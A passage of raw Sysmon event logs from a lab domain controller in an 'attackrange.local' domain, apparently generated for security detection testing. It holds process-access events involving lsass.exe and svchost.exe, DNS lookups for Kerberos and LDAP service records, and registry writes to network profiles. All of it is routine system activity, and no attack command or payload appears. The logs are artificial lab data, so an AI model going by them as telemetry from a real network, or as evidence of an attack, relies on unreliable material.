RNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002409Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:33.806{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3DF9-5F80-1500-000000007F01}1356C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002408Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:33.806{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3DF9-5F80-1500-000000007F01}1356C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002407Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:33.806{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3DF9-5F80-1500-000000007F01}1356C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002406Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:33.806{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3DF9-5F80-1500-000000007F01}1356C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002405Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:33.806{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3DF9-5F80-1500-000000007F01}1356C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002404Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:33.806{733EE690-3DF7-5F80-0B00-000000007F01}868100C:\Windows\system32\lsass.exe{733EE690-3DF6-5F80-0100-000000007F01}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96fe2|C:\Windows\system32\kerberos.DLL+794d4|C:\Windows\system32\kerberos.DLL+144c9|C:\Windows\system32\lsasrv.dll+2e101|C:\Windows\system32\lsasrv.dll+2c2c4|C:\Windows\system32\lsasrv.dll+31819|C:\Windows\system32\lsasrv.dll+2f177|C:\Windows\system32\lsasrv.dll+2e101|C:\Windows\system32\lsasrv.dll+16cdd|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be 10341000x80000000000000002403Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:33.791{733EE690-3DF7-5F80-0B00-000000007F01}868988C:\Windows\system32\lsass.exe{733EE690-3E09-5F80-3500-000000007F01}2636C:\Windows\system32\dfssvc.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002402Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:33.791{733EE690-3DF7-5F80-0B00-000000007F01}868988C:\Windows\system32\lsass.exe{733EE690-3E09-5F80-3500-000000007F01}2636C:\Windows\system32\dfssvc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\System32\RPCRT4.dll+112df|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002401Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:33.775{733EE690-3DF7-5F80-0B00-000000007F01}868988C:\Windows\system32\lsass.exe{733EE690-3DF6-5F80-0100-000000007F01}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96fe2|C:\Windows\system32\kerberos.DLL+794d4|C:\Windows\system32\kerberos.DLL+144c9|C:\Windows\system32\lsasrv.dll+2e101|C:\Windows\system32\lsasrv.dll+2c2c4|C:\Windows\system32\lsasrv.dll+31819|C:\Windows\system32\lsasrv.dll+2f177|C:\Windows\system32\lsasrv.dll+2e101|C:\Windows\system32\lsasrv.dll+16cdd|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be 10341000x80000000000000002400Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:33.385{733EE690-3DF7-5F80-0B00-000000007F01}868988C:\Windows\system32\lsass.exe{733EE690-3E09-5F80-3100-000000007F01}3064C:\Windows\system32\dns.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96fe2|C:\Windows\system32\kerberos.DLL+794d4|C:\Windows\system32\kerberos.DLL+144c9|C:\Windows\system32\lsasrv.dll+2e101|C:\Windows\system32\lsasrv.dll+2c2c4|C:\Windows\system32\lsasrv.dll+31375|C:\Windows\system32\lsasrv.dll+2f20b|C:\Windows\system32\lsasrv.dll+2e101|C:\Windows\system32\lsasrv.dll+16cdd|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be 10341000x80000000000000002399Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:33.306{733EE690-3DF7-5F80-0B00-000000007F01}868988C:\Windows\system32\lsass.exe{733EE690-3E09-5F80-3100-000000007F01}3064C:\Windows\system32\dns.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002398Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:33.306{733EE690-3DF7-5F80-0B00-000000007F01}868988C:\Windows\system32\lsass.exe{733EE690-3E09-5F80-3100-000000007F01}3064C:\Windows\system32\dns.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\System32\RPCRT4.dll+112df|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 22542200x80000000000000002524Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:33.869{733EE690-3DF7-5F80-0B00-000000007F01}868_ldap._tcp.Default-First-Site-Name._sites.DomainDnsZones.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002523Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:33.864{733EE690-3DF7-5F80-0B00-000000007F01}868_ldap._tcp.DomainDnsZones.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002522Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:33.860{733EE690-3DF7-5F80-0B00-000000007F01}868DomainDnsZones.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002521Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:33.857{733EE690-3DF7-5F80-0B00-000000007F01}868_kpasswd._udp.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002520Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:33.853{733EE690-3DF7-5F80-0B00-000000007F01}868_kpasswd._tcp.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002519Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:33.849{733EE690-3DF7-5F80-0B00-000000007F01}868_kerberos._udp.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002518Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:33.846{733EE690-3DF7-5F80-0B00-000000007F01}868_gc._tcp.Default-First-Site-Name._sites.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002517Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:33.841{733EE690-3DF7-5F80-0B00-000000007F01}868_gc._tcp.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002516Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:33.837{733EE690-3DF7-5F80-0B00-000000007F01}868_kerberos._tcp.Default-First-Site-Name._sites.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002515Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:33.832{733EE690-3DF7-5F80-0B00-000000007F01}868_kerberos._tcp.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002514Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:33.828{733EE690-3DF7-5F80-0B00-000000007F01}868_ldap._tcp.Default-First-Site-Name._sites.dc._msdcs.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002513Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:33.825{733EE690-3DF7-5F80-0B00-000000007F01}868_ldap._tcp.dc._msdcs.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002512Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:33.821{733EE690-3DF7-5F80-0B00-000000007F01}868_kerberos._tcp.Default-First-Site-Name._sites.dc._msdcs.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002511Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:33.821{733EE690-3DF9-5F80-1000-000000007F01}1132win-dc-7216619.attackrange.local0fe80::f993:88b1:f5c9:43f4;::ffff:10.0.1.14;C:\Windows\System32\svchost.exe 22542200x80000000000000002510Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:33.818{733EE690-3DF7-5F80-0B00-000000007F01}868_kerberos._tcp.dc._msdcs.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002509Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:33.816{733EE690-3DF7-5F80-0B00-000000007F01}868win-dc-7216619.attackrange.local0fe80::f993:88b1:f5c9:43f4;::ffff:10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002508Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:33.813{733EE690-3DF7-5F80-0B00-000000007F01}868df6ebb97-12db-430f-90c3-6a62699dc143._msdcs.attackrange.local.0type: 5 win-dc-7216619.attackrange.local;C:\Windows\System32\lsass.exe 22542200x80000000000000002507Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:33.810{733EE690-3DF9-5F80-1500-000000007F01}1356eu-central-1.compute.internal9501-C:\Windows\System32\svchost.exe 22542200x80000000000000002506Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:33.809{733EE690-3DF7-5F80-0B00-000000007F01}868gc._msdcs.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002505Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:33.806{733EE690-3DF7-5F80-0B00-000000007F01}868_ldap._tcp.f92057f0-af6f-41ea-b469-48ec6ed2312e.domains._msdcs.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002504Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:33.805{733EE690-3DF9-5F80-1100-000000007F01}1200win-dc-7216619.attackrange.local0fe80::f993:88b1:f5c9:43f4;::ffff:10.0.1.14;C:\Windows\System32\svchost.exe 22542200x80000000000000002503Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:33.801{733EE690-3DF7-5F80-0B00-000000007F01}868_ldap._tcp.Default-First-Site-Name._sites.gc._msdcs.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002502Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:33.798{733EE690-3DF7-5F80-0B00-000000007F01}868_ldap._tcp.gc._msdcs.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002501Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:33.795{733EE690-3DF7-5F80-0B00-000000007F01}868_msdcs.attackrange.local.0type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002500Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:33.795{733EE690-3DF7-5F80-0B00-000000007F01}868_msdcs.attackrange.local.0type: 2 win-dc-7216619.attackrange.local;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002499Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:33.794{733EE690-3DF7-5F80-0B00-000000007F01}868_ldap._tcp.pdc._msdcs.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002498Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:33.792{733EE690-3E09-5F80-3500-000000007F01}2636win-dc-7216619.attackrange.local0fe80::f993:88b1:f5c9:43f4;::ffff:10.0.1.14;C:\Windows\System32\dfssvc.exe 22542200x80000000000000002497Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:33.787{733EE690-3DF7-5F80-0B00-000000007F01}868_ldap._tcp.Default-First-Site-Name._sites.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002496Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:33.784{733EE690-3DF7-5F80-0B00-000000007F01}868_ldap._tcp.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002495Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:33.782{733EE690-3E09-5F80-3100-000000007F01}3064attackrange.local0type: 6 ;10.0.1.14;C:\Windows\System32\dns.exe 22542200x80000000000000002494Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:33.782{733EE690-3DF7-5F80-0B00-000000007F01}868attackrange.local.0type: 2 win-dc-7216619.attackrange.local;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002493Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:33.781{733EE690-3DF7-5F80-0B00-000000007F01}868_ldap._tcp.attackrange.local.0type: 33 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002492Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:33.781{733EE690-3E09-5F80-3100-000000007F01}3064attackrange.local0type: 2 win-dc-7216619.attackrange.local;10.0.1.14;C:\Windows\System32\dns.exe 22542200x80000000000000002491Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:33.780{733EE690-3E09-5F80-3100-000000007F01}3064win-dc-7216619.attackrange.local9501type: 6 ;10.0.1.14;C:\Windows\System32\dns.exe 22542200x80000000000000002490Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:33.780{733EE690-3DF7-5F80-0B00-000000007F01}868attackrange.local.0type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002489Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:33.780{733EE690-3DF9-5F80-1100-000000007F01}1200attackrange.local0::ffff:10.0.1.14;C:\Windows\System32\svchost.exe 22542200x80000000000000002488Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:33.779{733EE690-3DF7-5F80-0B00-000000007F01}868_ldap._tcp.Default-First-Site-Name._sites.attackrange.local.0type: 33 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002487Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:33.312{733EE690-3E09-5F80-3100-000000007F01}3064win-dc-7216619.attackrange.local0fe80::f993:88b1:f5c9:43f4;::ffff:10.0.1.14;C:\Windows\System32\dns.exe 22542200x80000000000000002486Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:33.311{733EE690-3DF7-5F80-0B00-000000007F01}868WIN-DC-72166190fe80::f993:88b1:f5c9:43f4;::ffff:10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002527Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:33.881{733EE690-3DF7-5F80-0B00-000000007F01}868_ldap._tcp.Default-First-Site-Name._sites.ForestDnsZones.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002526Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:33.876{733EE690-3DF7-5F80-0B00-000000007F01}868_ldap._tcp.ForestDnsZones.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002525Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:33.872{733EE690-3DF7-5F80-0B00-000000007F01}868ForestDnsZones.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 13241300x80000000000000002536Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-SetValue2020-10-09 10:40:40.322{733EE690-3DF9-5F80-1200-000000007F01}1208C:\Windows\system32\svchost.exeHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles\{39F8167F-6803-4747-9717-DB0E782B991C}\DateLastConnectedBinary Data 13241300x80000000000000002535Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-SetValue2020-10-09 10:40:40.322{733EE690-3DF9-5F80-1200-000000007F01}1208C:\Windows\system32\svchost.exeHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles\{39F8167F-6803-4747-9717-DB0E782B991C}\NameTypeDWORD (0x00000006) 13241300x80000000000000002534Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-SetValue2020-10-09 10:40:40.322{733EE690-3DF9-5F80-1200-000000007F01}1208C:\Windows\system32\svchost.exeHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles\{39F8167F-6803-4747-9717-DB0E782B991C}\DateCreatedBinary Data 13241300x80000000000000002533Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-SetValue2020-10-09 10:40:40.322{733EE690-3DF9-5F80-1200-000000007F01}1208C:\Windows\system32\svchost.exeHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles\{39F8167F-6803-4747-9717-DB0E782B991C}\CategoryDWORD (0x00000002) 13241300x80000000000000002532Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-SetValue2020-10-09 10:40:40.322{733EE690-3DF9-5F80-1200-000000007F01}1208C:\Windows\system32\svchost.exeHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles\{39F8167F-6803-4747-9717-DB0E782B991C}\ManagedDWORD (0x00000001) 13241300x80000000000000002531Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-SetValue2020-10-09 10:40:40.322{733EE690-3DF9-5F80-1200-000000007F01}1208C:\Windows\system32\svchost.exeHKLM\SOFTWARE\Microsoft\Windows 